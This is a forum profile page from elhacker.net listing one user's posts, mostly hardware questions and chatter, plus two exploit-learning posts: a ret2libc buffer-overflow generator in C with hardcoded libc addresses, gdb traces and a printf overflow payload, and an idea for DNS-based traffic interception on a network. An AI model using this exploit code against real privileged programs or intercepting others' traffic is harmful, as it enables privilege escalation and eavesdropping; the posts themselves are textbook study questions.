elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Temas
Páginas: [1] 2
1  Informática / Hardware / Gráfica muerta? Recomendaciones nueva gráfica en: 25 Abril 2017, 16:37 pm
Buenas,

Mi PC (https://foro.elhacker.net/hardware/pc_a_piezas_sobre_850%E2%82%AC-t339041.90.html)

Después de un añadido de un par de memorias (ahora tengo 16GB) y un disco SSD, parece que la gráfica está diciendo basta.

De vez en cuando (aunque últimamente ya es imposible funcionar con él), arranque windows, o ubuntu, pasado X minutos, empieza a salir cosas raras en la pantalla y en Windows se apaga y enciende la pantalla y te empieza a poner cosas de que el controlador gráfico ha dado un fallo.

También me ha pasado que si arranco después, incluso en la BIOS empiezan a verse cosas raras... Entiendo que mi gráfica ha dicho basta (la otra vez se solucionó sacándola y conectándola bien y enchufando, pero creo que el truco... ha dejado de funcionar)...

¿Alguna recomendación de gráfica que no sea muy cara (no juego), y me pueda solventar el apaño de volver a tener PC? :)

Gracias!
2  Informática / Hardware / Recomendaciones SSD nuevo en: 1 Julio 2016, 13:41 pm
Pues monté por piezas hace unos 5 años mi PC de sobremesa siguiendo los consejos de la comunidad y como tan bien me fue, voy a repetir buscando consejo :)

En el PC tengo un par de  Samsung Spinpoint F3 HD103SJ de 1TB y la verdad es que aunque siempre han ido bien, creo que migrar los SO que tengo a un SSD, sería como el día y la noche respecto a la velocidad...

Por ello, ¿Qué SSD me aconsejaríais?

EL PC que monté por si os interesa está aquí

También estoy pensando igual aumentar la RAM, pero eso ya es otro tema :P

Gracias por vuestras sugerencias!
3  Seguridad Informática / Hacking / Es esto posible? en: 16 Mayo 2012, 22:38 pm
Estaba pensando si esto estará ya implementado en el framework de metasploit o en alguna aplicación, o habrá que hacerlo a pelo.

Imaginemos una red de la que deseamos que todo el tráfico pase por nosotros. Somos capaces de hacer de servidor de dns de esa red, es decir, nosotros hacemos todas las traducciones de nombres, de tal manera, que somos capaces de darle nuestra ip en lugar de la verdadera.

¿Podemos hacer lo siguiente?

Victima => Dame google.com => Yo(DNS) => Mi Ip 192.168.1.2
Victima=>Llamo a google (192.168.1.2)=> Yo (sé que llama a google, lo mando a google transparentemente, pero yo me quedo con el tráfico).

Y sí, sé que se puede envenenar el ARP, pero mediante esta técnica,estaríamos captando, absolutamente todo el tráfico de la red y entiendo que dado que primero sabemos a donde van a invocar, después podemos saber a donde van.

Aunque claro, estoy suponiendo y no lo tengo claro, que el PC no cachee algunas traducciones sin necesidad de acudir al dns.

Saludos
4  Media / Juegos y Consolas / Nueva app para trofeos. en: 31 Marzo 2012, 14:10 pm
Buenas chavales,

Estamos montando una base de datos de guías de trofeos para nuestra aplicación Android (en un futuro bastante cercano disponible en iphone, blackberry, windows phone y puede que symbian).

Ahora mismo aunque los juegos están insertados, juegos con trofeos solo tenemos un par de ellos. ¿Por qué? Porque no quiero copiarlos de ningún sitio, quiero que la gente que ya se ha pasado juegos y conoce los trofeos, diga con sus propias palabras como lo hizo y a ser posible con qué video de youtube lo hizo para facilitar todo al resto.

El proyecto ha surgido de que a veces es muy incómodo estar con el PC al lado, buscando por foros. Pensamos que es más cómodo hacerlo desde un tablet o desde tu móvil, por otro lado a nosotros no nos interesa crearnos nuestro propio foro o web, porque entendemos que perjudicaríamos a éstos.

Es por esto, que si subes el trofeo, puedes indicar aparte del vídeo, de que post(foro) o entrada de blog proviene el trofeo y así si el usuario tiene dudas, con un solo click llegará a él directamente mientras lo consulta.

Esperamos poco a poco iros ofreciendo más servicios como sincronización con PSN/Live y similares.

Gracias por vuestro tiempo, si aún os interesa participar después de este coñazo que he soltado, entrad en www.mastertrophy.net

Saludos ;)
5  Seguridad Informática / Bugs y Exploits / Esta vez duda usando libc en: 21 Enero 2012, 00:08 am
Hola de nuevo compañeros, de nuevo tengo un problemilla.

Vayamos por partes que diría jack el destripador:

Tengo un programa que por poner un ejemplo se está ejecutando con el sticky bit y es propiedad de root y tiene una vulnerabilidad:
Código:
int main(int argc, char *argv[])
{
   char little_array[512];

   if(argc > 1)
     strcpy(little_array,argv[1]);

}

Y empleo el siguiente programa para generarme en una variable de entorno el buffer con el que explotar la vulnerabilidad:
Código:
#include <stdlib.h>
#include<stdio.h>

#define offset_size                    0
#define buffer_size                    600

char sc[] =
  "\x80\x0d\xed\xb7" //system()
  "\xf0\x68\xec\xb7" //exit()
  "\xbe\xc7\xfb\xb7" //binsh
;

unsigned long find_start(void) {
   __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
  char *buff, *ptr;
  long *addr_ptr, addr;
  int offset=offset_size, bsize=buffer_size;
  int i;

  if (argc > 1) bsize  = atoi(argv[1]);
  if (argc > 2) offset = atoi(argv[2]);

  if (!(buff = malloc(bsize))) {
             printf("Can't allocate memory.\n");
                     exit(0);
                       }


  addr = find_start() - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
     *(addr_ptr++) = addr;
  ptr += 4;

  for (i = 0; i < strlen(sc); i++)
          *(ptr++) = sc[i];

  buff[bsize - 1] = '\0';

  memcpy(buff,"BUF=",4);
  putenv(buff);
  system("/bin/bash");
}

Vale, entonces la idea es en una máquina en la que no tuviera una pila ejecutable, enviar el flujo a libc ejecutando una shell, para ello según el libro insertamos este cacho:

Código:
char sc[] =
  "\x80\x0d\xed\xb7" //system()
  "\xf0\x68\xec\xb7" //exit()
  "\xbe\xc7\xfb\xb7" //binsh

Donde serían las diferentes direcciones de esas llamadas (las he sacado mediante gdb como usa el libro y la de /bin/sh la he sacado con el memfetch como indica también, todo eso es correcto.

La cuestión es que soy incapaz de lograr modificar el retorno y eso que cuando probé con el método de meter NOPs a saco si que lo conseguí.

Los pasos que he realizado son los siguientes:
Generaba por ejemplo $BUF con ./ret2libc 590

Y luego con gdb paraba la ejecución antes de realizar el strcpy y en el ret:
Os dejo todos los desensamblados y más o menos los pasos que he seguido a ver en qué me estoy colando

Código:
pianista@pianista-desktop:~ $ gdb -q victim
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disas main
Dump of assembler code for function main:
0x08048374 <main+0>:    push   %ebp
0x08048375 <main+1>:    mov    %esp,%ebp
0x08048377 <main+3>:    sub    $0x218,%esp
0x0804837d <main+9>:    and    $0xfffffff0,%esp
0x08048380 <main+12>:   mov    $0x0,%eax
0x08048385 <main+17>:   sub    %eax,%esp
0x08048387 <main+19>:   cmpl   $0x1,0x8(%ebp)
0x0804838b <main+23>:   jle    0x80483a7 <main+51>
0x0804838d <main+25>:   mov    0xc(%ebp),%eax
0x08048390 <main+28>:   add    $0x4,%eax
0x08048393 <main+31>:   mov    (%eax),%eax
0x08048395 <main+33>:   mov    %eax,0x4(%esp)
0x08048399 <main+37>:   lea    0xfffffdf8(%ebp),%eax
0x0804839f <main+43>:   mov    %eax,(%esp)
0x080483a2 <main+46>:   call   0x80482a0 <strcpy@plt>
0x080483a7 <main+51>:   leave 
0x080483a8 <main+52>:   ret   
End of assembler dump.
(gdb) b *0x080483a2
Breakpoint 1 at 0x80483a2
(gdb) r $BUF
Starting program: /home/pianista/victim $BUF

Breakpoint 1, 0x080483a2 in main ()
(gdb) disas strcpy
Dump of assembler code for function strcpy:
0xb7f076f0 <strcpy+0>:  push   %ebp
0xb7f076f1 <strcpy+1>:  mov    %esp,%ebp
0xb7f076f3 <strcpy+3>:  push   %esi
0xb7f076f4 <strcpy+4>:  mov    0x8(%ebp),%esi
0xb7f076f7 <strcpy+7>:  mov    0xc(%ebp),%eax
0xb7f076fa <strcpy+10>: mov    %esi,%ecx
0xb7f076fc <strcpy+12>: sub    %eax,%ecx
0xb7f076fe <strcpy+14>: mov    %eax,%edx
0xb7f07700 <strcpy+16>: movzbl (%edx),%eax
0xb7f07703 <strcpy+19>: mov    %al,(%edx,%ecx,1)
0xb7f07706 <strcpy+22>: add    $0x1,%edx
0xb7f07709 <strcpy+25>: test   %al,%al
0xb7f0770b <strcpy+27>: jne    0xb7f07700 <strcpy+16>
0xb7f0770d <strcpy+29>: mov    %esi,%eax
0xb7f0770f <strcpy+31>: pop    %esi
0xb7f07710 <strcpy+32>: pop    %ebp
0xb7f07711 <strcpy+33>: ret   
End of assembler dump.
(gdb) b *0xb7f076f0
Breakpoint 2 at 0xb7f076f0
(gdb) b *0xb7f07711
Breakpoint 3 at 0xb7f07711
(gdb) continue
Continuing.

Breakpoint 2, 0xb7f076f0 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) x/20x $esp
0xbffff16c:     0x080483a7      0xbffff180      0xbffff565      0x00000000
0xbffff17c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff18c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff19c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1ac:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) continue
Continuing.

Breakpoint 3, 0xb7f07711 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) x/20x $esp
0xbffff16c:     0x080483a7      0xbffff180      0xbffff565      0x00000000
0xbffff17c:     0x00000000      0xb7ed0d80      0xb7ec68f0      0xb7fbc7be
0xbffff18c:     0xbffff838      0xbffff838      0xbffff838      0xbffff838
0xbffff19c:     0xbffff838      0xbffff838      0xbffff838      0xbffff838
0xbffff1ac:     0xbffff838      0xbffff838      0xbffff838      0xbffff838
(gdb) continue
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffff83f in ?? ()
(gdb) x/20x $esp
0xbffff38c:     0xc7beb7ec      0xbffff838      0xbffff838      0xbffff838
0xbffff39c:     0xbffff838      0xbffff838      0xbffff838      0xbffff838
0xbffff3ac:     0xbffff838      0xbffff838      0xbffff838      0xbffff838
0xbffff3bc:     0xbffff838      0xbffff838      0xbffff838      0xbffff838
0xbffff3cc:     0x0000f838      0x00000000      0xb7ff9300      0xb7eafded
(gdb) r $BUF
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/pianista/victim $BUF

Breakpoint 1, 0x080483a2 in main ()
(gdb) continue
Continuing.

Breakpoint 2, 0xb7f076f0 in strcpy () from /lib/tls/i686/cmov/libc.so.6
(gdb) x/20x $esp
0xbffff16c:     0x080483a7      0xbffff180      0xbffff565      0x00000000
0xbffff17c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff18c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff19c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1ac:     0x00000000      0x00000000      0x00000000      0x00000000
(gdb) x/700x $esp
0xbffff16c:     0x080483a7      0xbffff180      0xbffff565      0x00000000
0xbffff17c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff18c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff19c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1ac:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1bc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1cc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1dc:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1ec:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff1fc:     0x00000000      0x0804820c      0x0d696910      0xb7ea5fa8
0xbffff20c:     0xbffff244      0xb7fefb79      0xb7eabcd4      0x08048202
0xbffff21c:     0xb80019b9      0xb80019ac      0xb7fe6b38      0xbfff0002
0xbffff22c:     0xb7ff4c69      0x080481d0      0xb80019b8      0xb8000ff4
0xbffff23c:     0xb7fe6b0c      0x00000001      0xbffff2c8      0xb7feff42
0xbffff24c:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffff25c:     0x00000123      0x0003d8f5      0xbffff294      0xbffff294
0xbffff26c:     0xbffff384      0xf63d4e2e      0xb7fe6858      0x00000003
0xbffff27c:     0xb7e9dc28      0xb7e9da28      0x080481f0      0xf63d4e2e
0xbffff28c:     0x080481fc      0x080481f4      0x00000000      0x00000000
0xbffff29c:     0x00000001      0x00000838      0xb7fe6b38      0xb7fe6858
0xbffff2ac:     0x080481f0      0xb7ea67a8      0x08048190      0x00000001
0xbffff2bc:     0xb8000ff4      0xb8001898      0xbffff378      0xbffff394
0xbffff2cc:     0xb7ff0103      0x08048190      0xbffff378      0xb800183c
---Type <return> to continue, or q <return> to quit---q
Quit

Perdón por la chapa, es que he probado con diferentes - 600,590,595 y logro algún ilegal instrucion pero nada soy incapaz, y es que creo que no estoy acabándolo de pillar del todo.

Saludos y gracias.


6  Seguridad Informática / Bugs y Exploits / Duda sobre buffer overflow en: 23 Diciembre 2011, 14:48 pm
Hola qué tal?

A ver, tengo una duda que no me está permitiendo avanzar en este campo.

Empecé a leer el libro de shellcoders sobre exploits, entonces uno de los primeros ejemplos del libro es:

Código:
void return_input(void)
{
char array[30];

gets(array);
printf("%s\n",array);
}

main()
{
return_input();

return 0;
}


Vale, la idea es la siguiente:

Desensamblas con gdb la parte del main y obtienes la dirección a la que se invoca al return_input, con el fin de desbordar el buffer para que lo ejecute dos veces.

Aquí llega la cuestión, desesamblando me saca (por poner un ejemplo):

0x080483ed <main+3> call 0x80483c4 <return_input>

Y desbordo el buffer como indica el libro :
printf "AAAAAAAAAABBBBBBBBBBCCCCCCCCCCDDDDDD\xed\x83\x04\x08"|./overflow

Ahí está la cuestión, que no logro de ninguna manera que no dé segmentation fault, y que me repita dos veces la llamada al return_input

Estoy usando wifislax 2.0, que aquellos kernel y gcc y tal, no llevaban protecciones overflow, pero claro, yo lo que pienso es lo siguiente:

Cómo coño va  afuncionar, esa dirección que saca el gdb, no tiene por qué coincidir con la que haya en tiempo de ejecución, no???

Saludos y espero ayuda, que me encantaría iniciarme en profundidad, aunque ya he visto que el tema en los últimos años, ha ido poniendo muchísimas protecciones.



7  Foros Generales / Foro Libre / Master seguridad UPM alguien conoce? en: 21 Septiembre 2011, 20:52 pm
Pues eso, si alguien tiene referencias o lo ha hecho para que me comente un poco que tal es y eso, porque vale una pasta y ahora que estoy aún a tiempo de redefinir lo que haré este año, es una opción que estoy barajando xD

Saludos
8  Informática / Hardware / PC a piezas sobre 850€ en: 15 Septiembre 2011, 00:12 am
Compañeros de la nave del misterio:

Me gustaría pediros consejo, porque voy a acabar grillado de mirar tantísimas reviews de componentes, y sé que vosotros estáis mas actualizados que yo en estos temas.

La idea sería gastarme sobre 850€ en la torre, no lo quiero para jugar, pero sí me gustaría tener un buen rendimiento a la hora de manejar gráficos como pueda ser photoshop, edición de video, etc.

Además me gustaría poder usar alguna orquestilla virtual del sibelius, sin que se me muera el pc cada dos por tres.

Qué me recomendáis?

Para precios y tal, había pensado montarlo en PCBox de Valladolid, (el de Marina escobar me pilla mejor, pero me da igual uno que otro).

Saludos y gracias!
9  Foros Generales / Foro Libre / Anuncios con informáticos de transfondo en: 2 Abril 2011, 17:27 pm
Estoy haciendo un pequeño trabajo para la uni sobre los informáticos en los medios y aunque he encontrado algunos vídeos, la verdad no encuentro demasiados vídeos donde aparezcan informáticos en anuncios de hace años o de ahora.

Generalmente por lo que vi salen caracterizados como hackers o como frikis, si encontráis algún ejemplo y queréis compartirlo no lo dudéis en ponerlo y de paso me echáis un cable.

Aquí dejo unos cuantos que he encontrado ya:


http://www.youtube.com/watch?v=HdSZqvH-QB8
Es un curso de fascículo y te habla de entrar en el mundo de la informática. 1983




http://www.youtube.com/watch?v=6gaNyXWBcsU
Un pc de ibm de 1977


http://www.youtube.com/watch?v=2tJH5MVRe2U
Pavo y pava entrando hackeando xD

http://www.youtube.com/watch?v=5IGW7kDN8JA
Anuncio de cerveza dos hackers trayendo camiones de cerveza parece xD

http://www.youtube.com/watch?v=AhFPlWPezF0&feature=related
Buenisisisismo xD


http://www.youtube.com/watch?v=x-0SywV1bDM
Otro que es sobre fasciculos pero este ya es mas normal

http://www.youtube.com/watch?v=RTOROd6w5R0
Una academia donde ya empeizana  ofrecer titulaciones en USA.

http://www.youtube.com/watch?v=nDLL3erKagU
Sin palabras xD
10  Seguridad Informática / Hacking Wireless / Normas específicas de Hacking Wireless en: 29 Agosto 2007, 18:35 pm
Se informa visto lo visto a dia de hoy que se endurecera el hacking wireless....
A partir de hoy mismo, mensaje que hable de como piratear a un vecino o joderle o similar sera eliminado en ese instante, de acuerdo?
Saludos
Páginas: [1] 2
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines